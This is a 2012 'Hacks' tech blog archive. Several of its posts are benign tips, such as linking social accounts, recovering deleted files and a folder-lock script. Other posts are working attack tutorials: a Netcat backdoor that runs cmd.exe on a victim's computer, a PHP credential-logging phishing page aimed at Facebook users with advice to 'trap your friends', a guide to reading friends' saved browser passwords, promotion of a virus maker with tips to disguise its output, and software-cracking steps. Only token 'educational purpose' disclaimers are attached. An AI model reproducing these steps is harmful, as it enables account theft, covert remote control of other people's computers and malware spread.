Showing posts with label Hacks. Show all posts
Showing posts with label Hacks. Show all posts

Tuesday, September 11, 2012

How To Connect Facebook To Twitter or Twitter To Facebook

connect facebook twitter
You can now easily link your personal Facebook profile or page to your Twitter account, and publish your “public” status updates directly to Twitter. Save the hassle of logging into two websites just to update your current status. You can link your Twitter and Facebook accounts together and save heaps of time.

There are two ways to link Facebook and twitter
1) Connect your Facebook profile to twitter :
Update your Facebook status and it will also appear on your twitter profile.
2) Connect your twitter profile to Facebook :
Tweet from your twitter account and it will also appear on your Facebook profile.
How to connect your Facebook profile to twitter?
1) Go to http://www.facebook.com/twitter
2) Choose your Facebook account(your personal profile or page) and then click “Link to Twitter”
connect facebook twitter
















3) Then it ask for username and password of your twitter account to authorize the connection.
connect facebook twitter
 4) Choose which items you’d like to send to Twitter, of course they’ll have to be marked as “Public” for them to be shared.
connect facebook twitter
 5) Here’s what a Tweet directly from a Facebook public status update looks like. The link goes right to the destination, rather than through Facebook.
connect facebook twitter
 6) There you have it, now you can easily and seamlessly send your public Facebook status stream to Twitter.
How to Connect Twitter to Facebook:
1) Log in to Facebook and access the Twitter application by navigating to https://apps.facebook.com/twitter/
2) Click on “go to your twitter profile setting to start”
connect twitter to facebook
3) Log in to your twitter account, then it will redirect you to your profile page where in facebook section click on “post your tweets to facebook”.
connect twitter to facebook

 4) Allow and authorize access for Twitter to Facebook.
connect twitter to facebook
 5) Now every time you update your Twitter account, your Facebook status will update automatically.
That's it. Done ! Please share your views in comment Box. 

Sunday, September 9, 2012

How to Find Stored Passwords in Firefox and Chrome

hack stored password

Today i am going to show "How to hack your friend’s password" and "How to secure yourself from being hacked".

Firefox, Chrome and many other browsers use store password functionality. If you use these browser for login to Facebook or any other site, the browser ask for saving the details (i.e. username and password). If you save your details using this store password functionality then Firefox and chrome store your password.

Even though we all know it's a bad idea, a lot of people still use their browser's store password function to keep up with all their accounts. While convenient, this shortcut also makes their passwords very easy to find if you have access to the computer they're stored on.

How to view stored passwords on Firefox:
1) For Windows users, first open the main menu (Firefox) in the upper left-hand corner and select Options. If you're on a Mac, hit Firefox, then Preferences.
 2) Click on Security tab, then find the button marked Saved Passwords.
 3) A list of all the sites with passwords stored in Firefox will pop up. Click Show Passwords to view them.
How to view stored passwords on Chrome:
1) In the upper right-hand corner, click on the Wrench icon, then go to options. From there, click on personal stuff tab, then click on show saved Passwords.
 

That's all there is to it. As you can see, this is easy enough that just about anyone can do it.

How to Secure yourself from being hacked : 

As we know now how easy it is to view your stored site passwords in Firefox. If you plan on storing any passwords on your own browser (or already are), you should always use a Master Password to secure them. Otherwise, anyone using your Firefox who knows how to find these settings can access them.
1) For Windows users, first open the main menu (Firefox) in the upper left-hand corner and select Options. If you're on a Mac, hit Firefox, then Preferences.
2) Go to Security tab  and select check box for “use a master password”. Enter new password and click OK.
 2) For Chrome users they can disable this store password function. Just go to options, select personal stuff and choose never save password. That’s It!

Thursday, September 6, 2012

How To Create Backdoor Trojan To Spy On Remote Computer

backdoor trojan spy

What is Backdoor?
A "backdoor" into a computer is a hidden way of accessing the computer without the owner's knowledge.
What can Backdoor do?
Backdoor gives you full access of the target computer from your computer. You can read, delete, copy, or upload any file to victim’s computer.
What Will You Need?
  • Temporary access to target computer
  • IP address of the target computer
 Let’s Start to create backdoor: 
1) Download Netcat for Windows. This program is free and open-source, so you don't have to pay anyone to use it.
2) Unzip the program to any folder you wish.
3) Take the "nc.exe" program and copy it onto the target computer that you want to install a backdoor to. Make sure to put the nc.exe program into the "C:\Windows\System32" directory on the target machine.
4) In target computer, open a command prompt. Type the “cd c:\windows\system32" and press enter it will navigate to the folder where you placed the nc.exe program.
5) Type the following into the command prompt: "nc -d -L -e cmd.exe -p XXXX," where "XXXX" is the port number you wish to connect through. Choose something high, such as port 10000 or higher.
backdoor trojan virus
 6) On your machine, open a command prompt and type the following command: "telnet X.X.X.X XXXX," where "X.X.X.X" is the IP address of the target computer and "XXXX" is the port of the target computer that you opened earlier. This command opens a data link between the two computers, through which you can explore files, run commands and perform other actions.
 7) If you are using windows 7 then telnet is not activated by default so you have to activate it manually. To activate it go to “control panel --> program” and click on “turn windows feature on/off”. Then select both check boxes for telnet server and client.
telnet on or off
 8) That's it. Done ! Now you have full access to target computer.

Tuesday, September 4, 2012

How To Create Phishing Page For Facebook, Gmail, Yahoo


What is phishing?
The method in which the user receives a message with a link directing them to a fake phishing website which has the same look and feel as the legitimate website. If the user doesn’t look at the URL, it may be hard to tell the difference between the fake and legitimate websites. Then, the user is asked to provide personal information on the page for example username and password.
How to create Phishing Page For Facebook, Gmail, Yahoo :

1) Requirements :
(a) Fake Login Page
(b) getLoginDetails Page
(c) Free Web Hosting Account
2) How To Create Fake Login Page :
a) Open the www.facebook.com/login.php or login page for which you want to create a phishing page.
b) Save the page on desktop as .html
phishing page


3) How to create getLoginDetail page :
a) Open the notepad and paste the following code.
<?php
header ('Location: http://techehub.blogspot.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
b) 2nd line i.e. “Location” is that where you want to redirect your victim. If you want to redirect it to facebook  then change it to “https://www.facebook.com/login.php?login_attempt=1” 
c) Save the file as getLoginDetails.php 
4) Free Web Hosting : 
a) You have to upload these two pages to a free web hosting site. I recommend to use 000webhost as it is free and also supports the php files.
b) Login to your account and choose file manager to upload file. 
c) Upload pages under the public_html dir
d) After uploading these two page you will get the url for those page. It looks something like www.your-website-name.net63.net/login and www.your-website-name.net63.net/getLoginDetails.php
5) Final step :
a) Open the login.html(uploaded in 000webhost) in notepad.
b) Find the string “action”(using ctrl+f), you will see something like action=https://www.facebook.com/login.php?login_attempt=1
c) Replace the https://www.facebook.com/login.php?login_attempt=1  with your getloginDetail page url like www.your-website-name.net63.net/getloginDetails.php and save the page.
d) Now open the www.your-website-name.net63.net/login, it look like a real facebook login page. Enter the username and password and you will notice that a log.txt file is created in your webhosting account. It contain the username and password.
e) Use this link to trap your friends and get their username and password. Thats it. Done !
Note : Hacking is a crime. Do not use this tutorial to hack innocent people. I am sharing this tutorial for educational purpose only. I will not responsible for any damage done by you. 

Friday, August 24, 2012

How To Make Real Computer Virus

Real computer virus

Note : 
This is not a fake virus. It is not a batch script so be careful while using it. I recommend that you should create a system restore point before proceeding.
A virus can damage or harm your system. It can corrupt your file, document, software, videos, system processes. To create a real computer virus you did not need to be a programmer. It is easy as installing a software in windows 7. 
A JPS Virus Maker software make a real virus for you. You can send this virus to victim, email it to victim. You can rename this virus like explorer.exe, svchost.exe, winlogon.exe etc so that it should be hard to identify virus process in task manager. 
JPS virus maker : 
JPS virus maker
 
Fetures:



Disable Registry Editor

Disable Ms Config

Disable Task Manager

Disable Yahoo! Messenger

Disable Media Player

Disable Internet Explorer

Disable Time

Disable Group Policy

Disable Windows Explorer

Disable Norton Antivirus

Disable McAfee Antivirus

Disable Note Pad

Disable Word Pad

Disable Winows

Disable DHCP Client Service

Disable Taskbar

Disable Start Button

Disable MSN Messenger

Disable Command Prompt

Disable Security Center

Disable MSN Messenger

Disable System Restore

Disable Control Panel

Disable Desktop Icons

Disable Screen Saver
Hide Service Manager

Hide Outlook Express

Hide Windows Clock

Hide Desktop Icons

Hide All Process in Task Manager

Hide All Tasks in Task Manager

Hide Run in Start Menu

Change Explorer Caption

Clear Windows XP Password

Swap Mouse Buttons

Remove Folder Options

Lock Mouse & Keyboards

Mute Sound

Crazy Mouse

Allways CD-ROM Open

Turn Off Monitor (30 sec's)

Destroy Taskbar

Destroy Offlines (Y!Messenger)

Destroy Protected Strorage

Destroy Audio Service

Destroy Clipboard

Terminate Windows

Hide Cursor

Auto Startup

Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes

Change Server Name After Install in Process

Change Server Name

Download Link Mediafire : JPS Virus Maker (290 Kb)
Disclaimer : Hacking is a crime. I am sharing this tutorial for only educational purpose. I will not responsible for any damage done by you.

Sunday, August 19, 2012

How to get google to display Did you mean : [your name]


If you are searching something on Google and by mistake you mistyped, then  Google shows you did you mean : [correct keyword or phrase]. One day while surfing on internet I was wondered by seeing a photo,  uploaded by my friend. In that photo he searched phrase “greatest superstar of India” on Google and Google shows results as “did you mean : [his Name]”. So I tried to figure out how he did that. You want to know how to do this, lets do it.

How to Get Google to Display “Did you mean : [your name]”


google did you mean
 1) There is a dummy website in which you have to put your phrase and it shows results very similar to Google result page.
2) Go to : Gooogle
3) You have to Fill three fields
Your Search : Type what  you want seen in the URL of the page like (e.g. Best cs1.6 gamer in the world)
Did you mean : type what you want to appear in the “did you mean” part(e.g. Your name)
 Highlight : type what you want to be highlighted
google did you mean your name
 4) Now click on Gooogle button, then it shows three different options to share your page. To see result page, just click on image below option no 3.
google did you know name
 5) When you click on image, it shows result page which looks very similar to that of Google when it shows "Did you mean".
6) When you select first option, it add a image to your favorite social network or you can go for option no three--> print screen--> paste in paint--> crop --> upload. See how many like you will get or how your friends comment on your photo. Just For Fun !

Thursday, August 16, 2012

Simple Trick To Lock Your Computer

 This is the simple, easy trick to lock your computer.It is very important to lock your computer when you have to leave your computer for some time, especially when you are in company or college.
Generally, to lock your computer you have to do following procedure every time: Go to "Start--> Shut Down --> Lock". As shown below :

    But today i am going to show the easier way than this. In this trick we are going to create a shortcut on desktop or you can also lock your computer by pressing "Window Key+L" only.
Let's Start : 
1) Right Click on desktop-->choose "new"-->"shortcut". The shortcut wizard will open.
 2) Type the following text in TextBox :
%windir%\\System32\\rundll32.exe user32.dll,LockWorkStation
 3) Click Next. Then Type the name for shortcut e.g. lock.
 4) Click "Finish". A shortcut icon will appear on your desktop. Now to lock your computer just double click on "lock" shortcut.
5) Another simple and best way to lock your computer is "WindowsKey+L".
Please share your comments in CommentBox ! 

Sunday, August 12, 2012

Create Locked Password Protected Folder Without Using Any Software

Yes, you can create a locked password protected folder without using any third party software. While surfing on internet i found a .BAT script that creates a folder with password protection. You have to only copy & paste this script, put your password and you are done!

Here are the steps :
1) Open notepad. Copy and paste below script and save file as lock.bat
cls
@ECHO OFF
title technoyz.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== Your_password_goes_here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

2) Now when you double click on lock.bat, it will create a new folder named "MyFolder". You can put your private data into this folder.
3) After that again double click on lock.bat, it will hide the MyFolder. To show this folder click on lock.bat and enter your password.

 4) In this type, there is one type of drawback that anyone can see your password. You have to just right click on lock.bat-->choose "edit" and you can see source for file lock.bat.
5) The solution is to convert this .bat file to .exe file. By doing this nobody can view source for lock.exe. But you have to download "Bat to Exe converter" for this.
6) Download Link for : "Bat to Exe converter"
7) Open converter and select path of your .bat file and click on compile.





8) Done ! Delete the lock.bat file and Enjoy your locked password protected folder.

Wednesday, August 1, 2012

Restore Accidentally Deleted Files with Recuva


It can be the worst feeling in the world when you accidentally delete a very important file you have been working on for days.  Today we look at Recuva, a free tool that helps you restore accidentally deleted files.
 What is Recuva ?
Recuva is a freeware Windows utility to restore files that have been accidentally deleted from your computer. This includes files emptied from the Recycle bin as well as images and other files that have been deleted by user error from digital camera memory cards or MP3 players. It will even bring back files that have been deleted by bugs, crashes and viruses!
After using Recuva for a couple of days, I have ended up being very impressed with it. It is very fast with finding recoverable files and when you click on what you want brought back, it restores the file and sends it back to your hard drive within seconds.
Let's Begin :
1) Download Recuva from here... and install it.
2) When you first start up Recuva it brings up an easy to follow wizard which guides you through the recovery process.  There is an option to disable this from starting up if you don’t care to use it.
 3) Now choose the type of file your trying to recover.  If you’re not sure click on Other to show all files
 4) Select the location of where the file was located.  You can choose removable media, certain directories, or search everywhere on the computer.
5) Wait while Recuva scans your system for deleted files.
6) When you get the results it will show the file(s) and the green or red dot next to them lets you know how likely they will be restored without any damage.

 7) Now say I want to want to recover those 3 files? I just need to tick them and click the “recover” button. Recuva will ask me to specify where on the computer they should go.
8) Just remember to untick those files in Recuva before you close the program because Recuva remembers those files next time and will keep on downloading them over and over again! So untick them once you have recovered them.
Note : But as with any deleted file that you want to bring back, the older it is, the harder it will be to bring back. Plus if you are able to bring it back, the older it is, the more corrupted the file will be. So if you want to bring a deleted file back, you need to do it as fast as possible. The more you delay, the less chance there is of recovering it.
Do you use Recuva? If so, what have been your experiences with it?  What do you think about recuva? Is there any better software than recuva? please share your views in comments.

Tuesday, July 24, 2012

How to Hide Secret Documents inside JPG Images

Turn out that it is actually very easy to hide (or embed) other file inside a JPEG image. You can place video clips, pdf, mp3, Office documents, zipped files, webpage or any other file format inside a JPEG image.
Let's say you want to hide a confidential PDF document. What you can do is convert that file into a regular jpg image so even if anyone double-clicks this file, all he will see is a preview of the image and nothing else. And when you want to work on the actual PDF, just rename the extension from jpg to pdf.
Step 1: You will need two files - the file you want to hide and one jpg image - it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]

Step 2: Copy the above two files to the C: folder and open the command prompt window.

Step 3: Move to the c: root by typing cd\ [enter][if the files are in another folder, you'll have to change the prompt to that folder]

Step 4: The most important step - type the following command:
copy /b myimage.jpg + filetohide.txt my_new_image.jpg

Step 5: To see the original TXT file, just right click--> my_new_image.jpg and open with notepad-->go to end of file you will see your secret message.
Here we illustrated with an .TXT file. If you want to apply this technique to other file formats like XLS, DOC, PPT, AVI, WMV, WAV, SWF, etc, you may have to first compress them in RAR format before executing the copy /b DOS command.
To restore the original file, just open file with winRAR or 7-zip.

How to extend Windows 7 trial to a full version

If you install Windows 7 and don’t enter an installation key, the 30-day activation clock starts. To see how many days you have left, click Start, right-click Computer, and choose Properties. At the bottom of the dialog under Windows Activation, you’ll see the number of days left in your trial period.
When that number gets close to zero, you can extend the free period another 30 days via the following steps:
  • Step 1 : Click Start-->All Programs-->Accessories. Right-click Command Prompt and choose Run As Administrator. 
  • Step 2 : Type the following command and press Enter
slmgr  -rearm


  •  Step 3 : Restart Windows 7.
Once the OS restarts, the Properties dialog described above will indicate that Windows 7′s activation grace period has been reset to a full 30 days.

You can run the -rearm trick a total of three times. If you perform a -rearm at the end of each 30-day period, you end up with 120 days of full, unfettered Windows 7 use without having to supply an activation key.

Saturday, June 30, 2012

Google logo trick

  • Google Style Name :

You can put your name on Google search engine.http://www.buzzisearch.com/ is a site where you can put your name on search engine. Buzzisearch search is not a part of google.com. It use Google custom search to show the search results. Enter your name in search box and choose google style.
  •   Google loco :
  1. Enter "google loco" in google search and click on I'm Feeling Lucky.
  2. You will see "Google loco" moving.
  •  Google Gothic :
  1. Enter "google gothic" in google search and click on I'm Feeling Lucky. 
  2. You will see "Google Gothic" theme.
  3. Also try "google gothic 2" and click on I'm Feeling Lucky.



Friday, June 29, 2012

Cool javaScript tricks


Today, I will list some very cool JavaScript hacks and tricks that you can use creatively or just have plain fun. To make each one of these codes work, all you have to do is copy and paste it into the address bar of your browser window and hit “Enter”. So here they are :

  • Edit any page/website in real-time :
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 
  • This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example) 
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0); 
  • The Calculator : In case you are not in a mood to use the standard windows calculator and want your browser to do the dirty job for you, use this code.
javascript: alert(34343+3434-222);

You can change the numbers according to your choice and also try creative complex equations. Just put your arithmetic into javascript: alert( );
  • I have used Edit script on my google page and save it. Now when I open my firefox browser it shows image like above.

How to crack IDM to Full version

Here are the steps to convert trial version IDM to full version : 


  • Download and Run KeyPatch from here...
  • Click "Clear Previous registration data". 
  • Choose "Patch Server Check" -> Search File "IDMan.exe" in Installation directory. Usually directory at C:\Program Files\Internet Download Manager
  • Click on "Generate". This is your Serial Key.
  • Then, Run IDM.
  • Click on Registration and choose registration...(don't select order online)

  • Fill Form :
        First Name : Up to You
        Last Name  : Up to You   
        Email       : Up to You
        Serial     : Copy Serial from KEY PATCH IDM.exe
  • Finished...Enjoy full version IDM.
  • Do it Same if happen Fake Serial Number because you update your idm.
  • I have used and tested it on my IDM v 6.05. It works!
  • Please, Share your views in comments.